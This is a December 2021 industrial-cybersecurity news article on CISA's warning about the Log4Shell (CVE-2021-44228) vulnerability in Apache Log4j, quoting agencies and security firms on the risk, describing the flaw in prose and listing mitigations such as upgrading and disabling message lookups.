Attacks and Vulnerabilities
CISA
Critical infrastructure
IT/OT Collaboration
News

CISA warns public, private sector of critical log4j vulnerability

December 13, 2021
log4j vulnerability

The Cybersecurity and Infrastructure Security Agency (CISA) has urged public and private sector partners to proactively address a critical ‘log4j vulnerability’ that targets products containing the log4j software library. The vulnerability, which is being widely exploited by a growing set of hackers, presents an urgent challenge to network defenders given its broad use.

“To be clear, this vulnerability poses a severe risk. We will only minimize potential impacts through collaborative efforts between government and the private sector. We urge all organizations to join us in this essential effort and take action,” Jen Easterly, CISA director, wrote in a statement released on Saturday. “To ensure the broadest possible dissemination of key information, we are also convening a national call with critical infrastructure stakeholders on Monday afternoon where CISA’s experts provide further insight and address questions,” she added.  

To secure installations from the severe log4j vulnerability, CISA advised asset owners to enumerate any external-facing devices that have log4j installed, and make sure that the organization’s security operations center (SOC) is actioning every single alert on the devices that fall into the category above. The security agency also recommended installing a web application firewall (WAF) with rules that automatically update so that the SOC is able to concentrate on fewer alerts. 

“This effort also underscores the urgency of building software securely from the start and more widespread use of Software Bill of Materials (SBOM), both of which were directed by President Biden in his Executive Order issued in May 2021,” Easterly said. “A SBOM would provide end-users will the transparency they require to know if their products rely on vulnerable software libraries,” she added.

The U.S. administration has taken various measures to deal with rising cybersecurity incidents over recent months. 

Last week, the CISA had its inaugural Cybersecurity Advisory Committee meeting. “It’s clear that we’re at a critical juncture in cybersecurity, a moment when it will take our nation’s best thinking to defend against the evolving adversaries looking to do harm to our critical infrastructure,” Easterly said at the time. “It will require collaboration across government, the private sector, and the technical community. It demands that CISA has the right strategy in place to prepare for, respond to, and mitigate against cybersecurity threats to our Nation’s critical systems. In short, it takes more collaboration than ever before,” she added.

Previously, the agency has launched an effort called Joint Cyber Defense Collaborative (JCDC) to lead the development of the nation’s cyber defense plans by working across the public and private sectors to help defend U.S. critical infrastructure.

Log4j 2 is an open-source Java logging library developed by the Apache Foundation widely used by both enterprise apps and cloud services. Tracked as CVE-2021-44228 and dubbed ‘Log4Shell,’ the log4j vulnerability is an unauthenticated remote code execution (RCE) security loophole that allows complete system takeover on systems using Log4j 2.0-beta9 up to 2.14.1. The ​​log4j vulnerability has been seen in remote activity across 58 countries, until Dec 12th. 

Apache has released Log4j 2.15.0 to resolve the vulnerability, which is trivial to exploit. 

The U.K.’s National Cyber Security Centre (NCSC) said in an advisory that it is aware that scanning for the log4j vulnerability has been detected in the U.K. and exploitation detected elsewhere. A proof-of-concept code is available, it added.

The NCSC recommends that users install the latest updates as soon as practicable. “If you are using the Log4j 2 library as a dependency within an application you have developed, ensure you update to version 2.15.0 or later,” the security agency advised. “If you are using an affected third-party application, ensure you keep the product updated to the latest version. The flaw can also be mitigated in previous releases (2.10 and later) by setting system property ‘log4j2.formatMsgNoLookups’ to ‘true’ or removing the JndiLookup class from the classpath,” it added.

The German cybersecurity authority BSI also released over the weekend a red alert warning, its highest, on the flawed piece of widely-used software, saying it posed an ‘extremely critical threat’ to web servers. The BSI is said to have said that the agency is “aware of world- and Germany-wide mass scans as well as attempted compromises. Initial successful compromises are also being publicly reported,” according to a Reuters report

Cybersecurity firm McAfee has said that the log4j vulnerability was publicly disclosed along with proof of concept (PoC) code that exploits the vulnerability. “Should the vulnerability be present, an attacker might run arbitrary code by forcing the application or server to log a specific string. This string can force the vulnerable system to download and run a malicious script from the attacker-controlled system, which would allow them to effectively take over the vulnerable application or server.” 

“The vulnerability exists in the way the Java Naming and Directory Interface (JNDI) feature resolves variables,” Steve Povolny and Douglas McKee, wrote in a McAfee blog post. “When a JNDI reference is being written to a log, JNDI will fetch all requirements to resolve the variable. To complete this process, it will download and execute any remote classes required. This applies to both server-side and client-side applications since the main requirements for the vulnerability are any attacker-controlled input field and this input being passed to the log,” they added.

The Apache Log4j Remote Code Execution Vulnerability is the single biggest, most critical vulnerability of the last decade, ​​Amit Yoran, CEO of Tenable, wrote in an emailed statement. “This kind of vulnerability is a reminder that organizations must develop mature cybersecurity programs to understand cyber risk in a dynamic world. While details are still emerging, we encourage organizations to update their security controls, assume they have been compromised and activate existing incident response plans,” he added.

Anna Ribeiro
Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related

MITRE confirms breach on NERVE network, suspected foreign nation-state actor involved
MITRE confirms breach on NERVE network, suspected foreign nation-state actor involved
Radiflow helps customers achieve NIS2 compliance, spurring growth in Europe
Radiflow, Exclusive Networks partner to elevate OT cybersecurity
MITRE plans to enhance cybersecurity in 2024 with ICS sub-techniques and multi-domain integration
MITRE plans to enhance cybersecurity in 2024 with ICS sub-techniques and multi-domain integration
New bill introduced to set up Water Risk and Resilience Organization to secure water systems from cyber threats
New bill introduced to set up Water Risk and Resilience Organization to secure water systems from cyber threats
CISA, FBI, Europol, and NCSC-NL issue joint cybersecurity advisory on Akira ransomware threats
CISA, FBI, Europol, and NCSC-NL issue joint cybersecurity advisory on Akira ransomware threats
Mandiant exposes APT44, Russia's Sandworm cyber sabotage unit, targeting global critical infrastructure
Mandiant exposes APT44, Russia’s Sandworm cyber sabotage unit, targeting global critical infrastructure
Hexagon and Dragos announce technical alliance to boost industrial cybersecurity, reduce overall OT cyber risk
Hexagon and Dragos announce technical alliance to boost industrial cybersecurity, reduce overall OT cyber risk
Armis
Armis acquires Silk Security for $150 million to enhance AI-driven cybersecurity capabilities
Nozomi discovers five vulnerabilities in AMI MegaRAC SP-X BMC, exposing OT, IOT devices to RCE attacks
Nozomi secures US$1.25 million US Air Force contract to boost DoD critical infrastructure security
Industrial Cybersecurity Buyers’ Guide 2024 navigates complex industrial landscape
Industrial Cybersecurity Buyers’ Guide 2024 navigates complex industrial landscape